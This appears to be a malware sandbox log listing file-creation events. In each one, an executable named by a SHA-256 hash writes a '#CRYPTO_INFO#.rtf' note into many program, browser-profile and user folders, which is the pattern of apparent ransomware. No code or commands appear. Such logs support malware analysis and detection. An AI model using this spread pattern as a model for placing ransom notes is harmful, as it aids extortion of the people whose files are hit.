C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\db\bin\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\km-KH\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\bin\server\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\w0w630d3.default-release\settings\main\ms-language-packs\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ja\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Public\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\prs-AF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sd-Arab-PK\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ml-IN\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tn-ZA\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Documents\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\odt\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\EnvironmentsApp_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ko\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Public\Desktop\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\cmm\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\browser\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-ae\#CRYPTO_INFO#.rtf 